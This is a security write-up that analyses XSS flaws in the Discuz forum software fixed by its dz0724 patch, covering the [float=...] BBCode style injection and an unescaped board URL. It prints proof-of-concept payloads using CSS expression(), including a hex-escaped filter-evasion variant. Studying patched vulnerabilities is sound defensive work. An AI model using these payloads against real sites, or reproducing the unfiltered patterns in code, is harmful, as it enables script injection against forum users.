Comparing with the patch, we found this in \include\discuzcode.func.php:
$discuzcodes['searcharray']['bbcode_regexp'] = array( // the tags' regular expressions
"/\[align=([^\[\<]+?)\]/i", ----> before patching
"/\[float=([^\[\<]+?)\]/i"
|
V
"/\[align=(left|center|right)\]/i", ----> after patching
"/\[float=(left|right)\]/i"
Continuing, we see that the following code processes these two tags:
$discuzcodes['replacearray']['bbcode_regexp'] = array( // the replacement strings
........
"<p align=\"\\1\">",
"<br style=\"clear: both\"><span style=\"float: \\1;\">"
The replacement code:
$message = str_replace($discuzcodes['searcharray']['bbcode_str'],
$discuzcodes['replacearray']['bbcode_str'],
preg_replace(
($parsetype != 1 && $allowbbcode == 2 && $GLOBALS['_DCACHE']['bbcodes'] ? array_merge($discuzcodes['searcharray']['bbcode_regexp'], $GLOBALS['_DCACHE']['bbcodes']['searcharray']) : $discuzcodes['searcharray']['bbcode_regexp']),
($parsetype != 1 && $allowbbcode == 2 && $GLOBALS['_DCACHE']['bbcodes'] ? array_merge($discuzcodes['replacearray']['bbcode_regexp'], $GLOBALS['_DCACHE']['bbcodes']['replacearray']) : $discuzcodes['replacearray']['bbcode_regexp']),
$message));
Testing shows that $message has already been passed through htmlspecialchars or a similar function before it reaches str_replace, so neither " nor <> can be used.
This means "/\[align=([^\[\<]+?)\]/i" --> "<p align=\"\\1\">" cannot be exploited, since breaking out of the align attribute would need " or <>. Look at the float tag again:
"/\[float=([^\[\<]+?)\]/i" --> "<br style=\"clear: both\"><span style=\"float: \\1;\">"
After replacement, \1 ends up inside <span style=. Haha, using expression() inside style= needs no " to close anything :).
Test code:
[float=expression(alert(123456789))]test[/float]
The above is only a crude example. Many experts will scoff at it, and there are indeed situations where such a crude form cannot be used; it works here only because alert(123456789) contains no specially filtered characters. Look again at "/\[float=([^\[\<]+?)\]/i": the captured value receives no special filtering at all; only $message is passed through htmlspecialchars before the replacement.
Therefore it is fully usable, for example:
[float=\65\78\70\72\65\73\73\69\6f\6e\28\61\6C\65\72\74\28\31\32\33\34\35\36\37\38\39\29\29]test[/float]
But I still use the crude form :).
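As an added illustration (not Discuz's own code), the following applies the pre-patch and post-patch [float=...] search patterns quoted above to constructed input, reproducing the htmlspecialchars-then-preg_replace order the post describes; the sample values are constructed, and only the opening tag is handled.

```php
<?php
// Added example, not Discuz's own code: compares the pre-patch and post-patch
// [float=...] search patterns from discuzcode.func.php on constructed input,
// to show why the dz0724 whitelist closes the style-attribute injection.

// Search patterns as quoted above (before / after the patch).
const FLOAT_BEFORE = '/\[float=([^\[\<]+?)\]/i';
const FLOAT_AFTER  = '/\[float=(left|right)\]/i';
// Replacement as quoted above: \1 is written straight into a style attribute.
const FLOAT_REPLACE = '<br style="clear: both"><span style="float: \1;">';

// Mirrors the Discuz order of operations: htmlspecialchars() first, then the
// bbcode regex replacement. Only the opening tag is handled here.
function render_float(string $raw, string $pattern): string {
    $escaped = htmlspecialchars($raw, ENT_QUOTES);
    return preg_replace($pattern, FLOAT_REPLACE, $escaped);
}

// Constructed inputs: a legitimate keyword and an arbitrary non-keyword value.
$inputs = [
    '[float=left]test[/float]',
    '[float=anything-goes-here]test[/float]',
];

foreach ($inputs as $raw) {
    echo "input : $raw\n";
    echo "before: " . render_float($raw, FLOAT_BEFORE) . "\n";
    echo "after : " . render_float($raw, FLOAT_AFTER) . "\n\n";
}
// Before the patch, the second input's value lands verbatim inside
// style="float: ...;" because reaching that position needs neither [ nor <,
// and htmlspecialchars() leaves letters, parentheses and backslashes untouched.
// After the patch, the non-keyword tag is left unreplaced as inert escaped text.
```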
Afterword: some of the code in DZ's discuzcode is really poorly written [I mean code style]. I suppose the person in charge of DZ's code security is also frustrated; are vulnerabilities invisible? Pure speculation...... Still, black-box testing for XSS is more convenient than reading the code. [Some people will be very happy to see this.]
Another XSS fixed by the dz0724 patch
\include\common.inc.php:
$boardurl = 'http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/'; ----> before patching
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/'); ----> after patching